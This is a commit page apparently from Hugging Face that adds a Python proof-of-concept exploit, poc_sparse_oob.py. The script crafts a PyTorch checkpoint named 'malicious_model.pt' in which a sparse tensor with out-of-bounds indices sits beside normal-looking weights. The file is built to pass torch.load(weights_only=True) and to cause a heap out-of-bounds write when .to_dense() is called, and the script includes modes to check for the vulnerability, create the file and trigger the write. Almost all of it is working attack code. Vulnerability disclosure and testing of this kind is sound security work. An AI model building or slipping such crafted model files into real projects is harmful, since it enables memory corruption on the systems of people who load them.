shimacoder commited on
Commit
238fd51
·
verified ·
1 Parent(s): 88c88e4

Upload poc_sparse_oob.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. poc_sparse_oob.py +184 -0
poc_sparse_oob.py ADDED
@@ -0,0 +1,184 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ PoC: Sparse Tensor OOB Memory Corruption via torch.load(weights_only=True)
4
+
5
+ This PoC demonstrates that a crafted .pt file containing a sparse tensor
6
+ with out-of-bounds indices can be loaded with weights_only=True (the default
7
+ safe mode) and cause heap memory corruption when the tensor is used.
8
+
9
+ The root cause is that _validate_loaded_sparse_tensors() skips validation
10
+ when check_sparse_tensor_invariants is disabled (the default since PyTorch 2.8.0).
11
+
12
+ IMPACT: Heap OOB write when .to_dense() is called on the loaded sparse tensor.
13
+ AFFECTED: PyTorch >= 2.8.0 with weights_only=True (default since 2.6.0)
14
+
15
+ Usage:
16
+ python poc_sparse_oob.py --create # Creates malicious_model.pt
17
+ python poc_sparse_oob.py --load # Loads and triggers the bug
18
+ python poc_sparse_oob.py --check # Checks if current PyTorch is vulnerable
19
+ """
20
+
21
+ import argparse
22
+ import sys
23
+ import os
24
+
25
+
26
+ def check_vulnerability():
27
+ """Check if the current PyTorch installation is vulnerable."""
28
+ try:
29
+ import torch
30
+ except ImportError:
31
+ print("[!] PyTorch is not installed. Install it to test.")
32
+ return False
33
+
34
+ print(f"[*] PyTorch version: {torch.__version__}")
35
+
36
+ # Check 1: Is check_sparse_tensor_invariants disabled?
37
+ invariants_enabled = torch.sparse.check_sparse_tensor_invariants.is_enabled()
38
+ print(f"[*] Sparse tensor invariant checks enabled: {invariants_enabled}")
39
+
40
+ if invariants_enabled:
41
+ print("[*] NOT VULNERABLE: Sparse tensor invariant checks are enabled.")
42
+ print(" This means _validate_loaded_sparse_tensors() will catch OOB indices.")
43
+ return False
44
+
45
+ # Check 2: Is _rebuild_sparse_tensor in the weights_only allowlist?
46
+ from torch._weights_only_unpickler import _get_allowed_globals
47
+ allowed = _get_allowed_globals()
48
+ rebuild_sparse_key = "torch._utils._rebuild_sparse_tensor"
49
+ if rebuild_sparse_key in allowed:
50
+ print(f"[*] _rebuild_sparse_tensor IS in the weights_only allowlist")
51
+ else:
52
+ print(f"[*] _rebuild_sparse_tensor is NOT in the weights_only allowlist")
53
+ print(" NOT VULNERABLE via this vector.")
54
+ return False
55
+
56
+ # Check 3: Verify _validate_loaded_sparse_tensors skips validation
57
+ from torch._utils import _sparse_tensors_to_validate, _validate_loaded_sparse_tensors
58
+ # Add a dummy entry
59
+ dummy = torch.sparse_coo_tensor(
60
+ torch.tensor([[0]]),
61
+ torch.tensor([1.0]),
62
+ (10,),
63
+ check_invariants=False
64
+ )
65
+ _sparse_tensors_to_validate.append(dummy)
66
+ _validate_loaded_sparse_tensors()
67
+ # If the list was cleared without validation, we're vulnerable
68
+ if len(_sparse_tensors_to_validate) == 0:
69
+ print("[*] _validate_loaded_sparse_tensors() SKIPPED validation (list cleared)")
70
+ print("[!] VULNERABLE: Sparse tensors loaded from files are NOT validated!")
71
+ return True
72
+ else:
73
+ print("[*] _validate_loaded_sparse_tensors() performed validation")
74
+ return False
75
+
76
+
77
+ def create_malicious_model(output_path="malicious_model.pt"):
78
+ """Create a .pt file containing a sparse tensor with OOB indices."""
79
+ import torch
80
+
81
+ print(f"[*] Creating malicious model file: {output_path}")
82
+
83
+ # Create a sparse COO tensor with indices that point far outside bounds
84
+ # The tensor claims to be size (10,) but has an index at position 999999
85
+ # When converted to dense, PyTorch will try to write to index 999999
86
+ # in a buffer of size 10, causing heap OOB write.
87
+
88
+ # Approach 1: Simple 1D case
89
+ oob_indices = torch.tensor([[0, 7, 999999]]) # index 999999 is OOB for size 10
90
+ values = torch.tensor([1.0, 2.0, 3.0])
91
+ size = torch.Size([10])
92
+
93
+ # Create without validation
94
+ with torch.sparse.check_sparse_tensor_invariants(False):
95
+ malicious_sparse = torch.sparse_coo_tensor(
96
+ oob_indices, values, size, check_invariants=False
97
+ )
98
+
99
+ # Save as a state dict (standard model checkpoint format)
100
+ state_dict = {
101
+ "weight": torch.randn(10, 10), # Normal tensor (looks legit)
102
+ "bias": torch.randn(10), # Normal tensor
103
+ "sparse_layer": malicious_sparse, # Malicious sparse tensor
104
+ }
105
+
106
+ torch.save(state_dict, output_path)
107
+ print(f"[+] Malicious model saved to {output_path}")
108
+ print(f" File size: {os.path.getsize(output_path)} bytes")
109
+ print(f"[*] The 'sparse_layer' key contains a sparse tensor with OOB indices")
110
+ print(f" Declared size: {size}")
111
+ print(f" Max index in indices: {oob_indices.max().item()}")
112
+ return output_path
113
+
114
+
115
+ def load_and_trigger(model_path="malicious_model.pt"):
116
+ """Load the malicious model and trigger the OOB memory access."""
117
+ import torch
118
+
119
+ print(f"[*] Loading model from: {model_path}")
120
+ print(f"[*] Using weights_only=True (the default safe mode)")
121
+
122
+ # This should succeed -- weights_only=True allows sparse tensors
123
+ state_dict = torch.load(model_path, weights_only=True)
124
+
125
+ print(f"[+] Model loaded successfully with weights_only=True")
126
+ print(f"[*] Keys in state_dict: {list(state_dict.keys())}")
127
+
128
+ sparse_tensor = state_dict["sparse_layer"]
129
+ print(f"[*] Sparse tensor loaded:")
130
+ print(f" Layout: {sparse_tensor.layout}")
131
+ print(f" Size: {sparse_tensor.size()}")
132
+ print(f" Indices shape: {sparse_tensor._indices().shape}")
133
+ print(f" Max index: {sparse_tensor._indices().max().item()}")
134
+ print(f" Invariant checks enabled: {torch.sparse.check_sparse_tensor_invariants.is_enabled()}")
135
+
136
+ print()
137
+ print("[!] About to call .to_dense() -- this will trigger OOB memory write!")
138
+ print("[!] The tensor has index 999999 but size is only 10")
139
+ print("[!] This writes to memory offset 999999 * sizeof(float) = ~4MB past buffer end")
140
+ print()
141
+
142
+ # WARNING: This will likely crash or corrupt memory
143
+ input("Press Enter to trigger the OOB write (or Ctrl+C to abort)... ")
144
+
145
+ try:
146
+ dense = sparse_tensor.to_dense()
147
+ print(f"[!] to_dense() completed (memory may be corrupted)")
148
+ print(f" Dense shape: {dense.shape}")
149
+ print(f" Dense values: {dense}")
150
+ except Exception as e:
151
+ print(f"[!] Exception during to_dense(): {type(e).__name__}: {e}")
152
+
153
+
154
+ def main():
155
+ parser = argparse.ArgumentParser(
156
+ description="PoC: Sparse Tensor OOB via torch.load(weights_only=True)"
157
+ )
158
+ parser.add_argument("--create", action="store_true",
159
+ help="Create the malicious model file")
160
+ parser.add_argument("--load", action="store_true",
161
+ help="Load the malicious model and trigger the bug")
162
+ parser.add_argument("--check", action="store_true",
163
+ help="Check if the current PyTorch is vulnerable")
164
+ parser.add_argument("--output", default="malicious_model.pt",
165
+ help="Output path for the malicious model file")
166
+ args = parser.parse_args()
167
+
168
+ if not any([args.create, args.load, args.check]):
169
+ parser.print_help()
170
+ return
171
+
172
+ if args.check:
173
+ vulnerable = check_vulnerability()
174
+ sys.exit(0 if vulnerable else 1)
175
+
176
+ if args.create:
177
+ create_malicious_model(args.output)
178
+
179
+ if args.load:
180
+ load_and_trigger(args.output)
181
+
182
+
183
+ if __name__ == "__main__":
184
+ main()